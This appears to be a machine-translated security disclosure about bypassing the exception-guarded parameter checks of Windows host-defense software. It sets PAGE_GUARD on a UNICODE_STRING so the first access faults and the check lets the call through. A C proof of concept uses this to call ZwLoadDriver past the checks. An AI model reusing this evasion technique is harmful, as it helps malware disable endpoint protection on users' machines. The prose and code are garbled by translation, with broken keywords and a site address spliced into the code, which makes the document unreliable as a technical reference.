Active Defense software has a common vulnerability in implementation. malware can bypass security checks to execute malicious behaviors.
The anti-DDoS pro intercepts some key system operations and performs parameter checks on these monitoring points. Because parameters often come from the user State, the parameter check process is in a _ try to prevent access violations from causing crash. The general mode is similar to the following: bool bPass = true; _ try {bPass = check_paramters (p1, p2, p3); // p is the parameter }__ precondition T (1) {bPass = true;} return (bPass? Status_success: status_access_denied); The above is only pseudo code, which means to check the parameter. If malicious behavior is found, the response is rejected and execution is not allowed. (Actually far more complex than this, the parameter will undergo a lot of policy checks. The results are not directly returned. It is possible that a dialog box is displayed and determined by the user ). The problem is that if an exception occurs during access to the parameter, the subsequent processing will have to let go of this behavior. This is where the problem occurs. If the access parameters of the anti-DDoS pro are abnormal but the system can use the parameters normally, the inspection of the anti-DDoS pro is bypassed. This is not impossible; otherwise it is not a vulnerability! Windows has a unique place in memory management, called PAGE_GUARD. After the PAGE_GUARD attribute is set for a piece of memory space, the first access to this part of memory will be abnormal, and subsequent access will be normal. Therefore, by using this mechanism, coupled with detection and testing of security software, the above vulnerabilities can be well exploited. Vulnerability proof: pStr = (PUNICODE_STRING) VirtualAlloc (NULL, PAGE_SIZE, MEM_COMMIT, PAGE_READWRITE); if (! PStr) {_ tprintf (_ T ("Alloc Str Failed \ n"); goto _ Cleanup;} pStr-> Length = (USHORT) (wcslen (SERVICE_PATH) * sizeof (WCHAR); pStr-> MaximumLength = pStr-> Length + sizeof (WCHAR); pStr-> Buffer = (PWSTR) (pStr + 1 ); wcscpy_s (pStr-> Buffer, pStr-> MaximumLength/sizeof (WCHAR), p); // STATUS_SUCCESSif (! VirtualProtect (pStr, PAGE_SIZE, PAGE_READWRITE | PAGE_GUARD, & dwOldProt) {_ tprintf (_ T ("VirtualProtect Failed \ n"); goto _ Cleanup;} www.2cto. comif (status = ZwLoadDriver (pStr ))! = 0) {_ tprintf (_ T ("ZwLoadDriver Failed status = % x \ n"), status); goto _ Cleanup ;} _ tprintf (_ T ("ZwLoadDriver Successfully \ n "));
Solution:
Study by yourself... thanks to newtongao and garymao